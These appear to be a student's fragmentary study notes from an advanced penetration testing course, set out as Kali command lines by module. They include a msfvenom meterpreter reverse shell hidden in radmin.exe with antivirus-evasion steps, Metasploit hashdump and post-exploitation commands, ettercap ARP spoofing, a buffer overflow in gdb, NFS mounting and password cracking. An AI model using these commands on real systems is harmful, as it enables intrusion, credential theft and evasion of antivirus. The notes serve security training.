Advanced Penetration Testing Notes

By: Oishi | Related Course: Advanced Penetration Testing

Module 1 - Linux

> nc -lvp 1234 > myfile3
> cat myfile3
this is a secret
> cd /etc
> ls | grep cron
> nano crontab (shows list of jobs)
> nano cron.daily/ (run daily)
> 17 m * h *** (= every 17min of every hour of every day)
> nano cron


Module 10 - Post Exploitation

Program: smbexec
kali:
> smbexec.rb
> 1
> 7
> 10.0.0.75
> Username
> 3
> 2
> cd log/smbexec-2014-1
> cd log/smbexec-2014-12-29/hashes
> opt/smbexec-2014-12-29/hashes# sessions -i 6
list_tokens -u
> getuid
> u


Module 10 - Post Exploitation

os> Kali
MSF - Metasploit
> sessions -i 1
> Help
> hashdump
> upload /usr/share/windows-binaries/nc.exe C:\\
> cd /usr/share/metasploit-framework/scr meterpreter
> run getgui
> background
> use /post/windows/gather/enum_logged_on_users


Module 11 - WebApps

Program: Burp Suite and Iceweasel
Sends all traffic through the proxy
Proxy: Intercept: on
Spider the host


Module 12 - Exploit Development

(gdb) run $(python -c 'print "A" * 9 + "B" * 4')
(gdb) disassemble overflowed
(gdb) run $(python -c 'print "A" * 9 + "\x08\x04\x83\xf4"')
(gdb) x/16xw $esp
(gdb) endianness


Module 2 - Programming

# nano cprogram.c
# gcc cprogram.c -o cprogram
cprogram.c: In function 'main':
cprogram.c:14:3: error: expected ';' before 'return'
# nano cprogram.c
# gcc cprogram.c -o cprogram
# chmod +x cprogram
Pass your name as an argument
./cprogram Georgia
Hello Geor


Module 3 - Metasploit

> kali linux
> cd /usr/share/metasploit-framework/
:/usr/share/metasploit-framework> cd /root
> msfvenom


Module 4 - Information Gathering

kali>
> recon-ng
> show modules
> use recon/contacts-creds/haveIbeenpwned
> set source "email address"
> run
> exit
google dorks
browser>>> exploit-db.com/google-dorks/


Module 5 - Vulnerability Discovery/Scanning

Kali
> zervit 0.4 web server
> http://192.168.1.76:3232


Module 6 - Traffic Capture

Kali
man in the middle
> ettercap -Ti eth0 -M arp:remote /192.168.1.1/ /192.168.1.76/
arp spoof outcome
> nano /proc/sys/net/ipv4/ip_forward
wireshark > filter TLSv1 or HTTP
ettercap
> nano /etc/ettercap/etter.conf
(turn off ipv4)


Module 7 - Exploitation

Attaching to Kali
additional research on mounting ip address
> showmount -e "ipaddress"
> mkdir /tmp/name
> mount -t nfs "ipaddress":/export/name /tmp/name
> mount -t nfs -o nolock "ipaddress":/export/name /tmp/name
> cd /tmp/name
cd /tmp/na


Module 8 - Passwords

Program - john the ripper
> john
> nano hash.txt
passwords.txt
> john Desktop/windows7hashes.txt --wordlist=passwords.txt
> cd /usr/share/john/
> nano password.lst
To add complex passwords, use rules.


Module 9 - Advanced Exploitation

Os> Kali
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.77 LPORT=1234 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
> www.virustotal.com
> cd Hyperion-1.1/
> ideally create own code to a windows A

